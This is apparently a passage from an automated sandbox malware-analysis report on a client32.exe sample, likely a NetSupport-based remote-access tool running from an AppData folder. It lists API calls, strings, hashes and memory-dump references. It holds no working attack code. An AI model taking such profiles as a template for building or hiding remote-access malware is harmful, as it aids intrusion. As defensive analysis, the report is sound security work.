                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeaveSleep
                                                                              • String ID: Push
                                                                              • API String ID: 1566154052-4278761818
                                                                              • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                              • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                              Function 00951020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCommandLineA.KERNEL32 ref: 00951027
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 0095107B
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00951096
                                                                              • ExitProcess.KERNEL32 ref: 009510A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2968364486.0000000000951000.00000020.00000001.01000000.00000006.sdmp, Offset: 00950000, based on PE: true
                                                                              • Associated: 00000003.00000002.2968285369.0000000000950000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2968386737.0000000000952000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_950000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                              • String ID:
                                                                              • API String ID: 2164999147-0
                                                                              • Opcode ID: e4ae6f0343928b0474b9ea2854a4d99a6baad33831ae6a70ccb123245744aa88
                                                                              • Instruction ID: a3579aafe954900d275663e13cb4ab542ba3ad1310182b8a8f7c1f205472b9fd
                                                                              • Opcode Fuzzy Hash: e4ae6f0343928b0474b9ea2854a4d99a6baad33831ae6a70ccb123245744aa88
                                                                              • Instruction Fuzzy Hash: F111AD204083C45AEB31DF7288487FABFA99B02383F640448ECD6961C6D35648CFC7A5
                                                                              Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, xrefs: 11144804, 11144812
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentFileModuleNameProcess
                                                                              • String ID: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                              • API String ID: 2251294070-1846808567
                                                                              • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                              • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                              Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memset.LIBCMT ref: 11110262
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp
                                                                              • API String ID: 2803934178-2363596943
                                                                              • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                              • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                              • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                              • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                              Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle
                                                                              • String ID: \\.\NSWFPDrv
                                                                              • API String ID: 3498533004-85019792
                                                                              • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                              • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                              • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                              • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                              Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _calloc
                                                                              • String ID:
                                                                              • API String ID: 1679841372-0
                                                                              • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                              • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                              • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                              • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                              Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                              • __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                              • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                              • String ID:
                                                                              • API String ID: 1847508633-0
                                                                              • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                              • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                              • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                              • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                              Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,01611D68,?,00000001,00000001), ref: 1109EDC3
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                              • String ID:
                                                                              • API String ID: 2256153495-0
                                                                              • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                              • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                              • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                              • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                              Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(111F1908,AB86ACF8,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                              • EnterCriticalSection.KERNEL32(111F1908,AB86ACF8,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                              • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                              • String ID:
                                                                              • API String ID: 3991485460-0
                                                                              • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                              • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                              • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                              • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                              Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: ??CTL32.DLL
                                                                              • API String ID: 1029625771-2984404022
                                                                              • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                              • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                              • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                              • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                              Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DriveType
                                                                              • String ID: ?:\
                                                                              • API String ID: 338552980-2533537817
                                                                              • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                              • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                              • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                              • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                              Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                              • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
